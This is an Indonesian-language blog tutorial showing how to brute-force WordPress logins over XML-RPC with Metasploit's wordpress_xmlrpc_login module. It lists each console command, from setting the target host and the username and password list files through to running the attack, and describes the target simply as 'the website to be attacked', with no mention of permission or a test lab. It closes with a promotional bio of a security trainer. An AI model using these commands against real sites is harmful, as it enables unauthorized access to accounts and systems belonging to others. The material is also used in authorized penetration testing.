Tutorial Brute Force CMS WordPress dengan Metasploit (XMLRPC)

Dalam tutorial ini kita akan membahas tentang cara Brute Force CMS WordPress dengan Metasploit framework.

Brute Force adalah teknik login paksa menggunakan list password yang telah di buat dengan kombinasi huruf, angka, karakter khusus, dan huruf kecil dan kapital dengan cara otomatis untuk mendapatkan akses melalui host atau layanan. Jenis serangan ini memiliki probabilitas keberhasilan yang tinggi, tetapi membutuhkan banyak waktu untuk memproses semua kombinasi.

Dalam tutorial ini, kita akan membahas cara melakukan serangan brute-force menggunakan Metasploit di CMS WordPress.

Pastikan kalian telah menginstal Metasploit framework, jika belum silahkan instal metasploit, kalian bisa baca postingan saya sebelumnya tentang tutorial instal metasploit framework.

Brute Force CMS WordPress dengan Metasploit framework

Pertama jalankan Metasploit dengan command berikut:

msfconsole

Di sini kita akan menggunakan auxiliaries, sebuah tool Brute force CMS WordPress yang sudah tersedia di Metasploit, untuk menjalankan auxiliaries masukan command berikut:

search xmlrpc

Maka akan tampil beberapa tools yang bisa di gunakan di Metasploit, untuk melakukan brute force WordPress silahkan masukan perintah berikut:

tutorial Brute Force CMS WordPress dengan Metasploit

Untuk Brute Force CMS WordPress masukan command berikut:

use auxiliary/scanner/http/wordpress_xmlrpc_login

show option

Pastikan kalian sudah membuat list password untuk Bruteforce CMS WordPress ini dan target yang akan di serang, contoh:

set rhosts {alamat ip}

set targeturi /wp

set user_file /home/root/user.txt

set pass_file /home/root/smalldict.txt

Keterangan:

  • {alamat ip} ganti dengan alamat website yang akan di serang.
  • /home/root/ adalah tempat dimana anda menyimpan file passlist dan userlist.
  • smalldict.txt adalah default list password Metasploit.

Untuk eksekusi atau memulai Bruteforce CMS WordPress masukan command:

exploit

Tunggu hingga proses Bruteforce selesai, ini mungkin akan memakan waktu yang cukup lama, sampai menemukan kombinasi username dan password yang pas.

Untuk lebih jelasnya kalian bisa lihat di video berikut ini:

Video di atas adalah video dari channel YouTube Kurniawan Aja, seorang mentor di:

Website: http://xcodeserver.my.id

Komunitas: http://xcode.or.id

Channel YouTube: https://www.youtube.com/channel/UCJ_56V2QVt0ZKyNgsdjb7Pw

Kurniawan adalah seorang intelektual, master ilmu komputer, sarjana komputer, filsuf, security expert, reseacher & trainer. Belasan tahun terjun di dunia hacking dan keamanan komputer, mengisi seminar keamanan di belasan kampus, mengisi training untuk instansi pemerintah. Saat ini fokus di bidang ethical hacking khususnya vulnerability development & shellcode development.

Itulah tutorial Brute Force CMS WordPress dengan Metasploit (XMLRPC), semoga bermanfaat.

Tutorial Brute Force CMS WordPress dengan Metasploit (XMLRPC)

Tinggalkan Balasan

Kembali ke Atas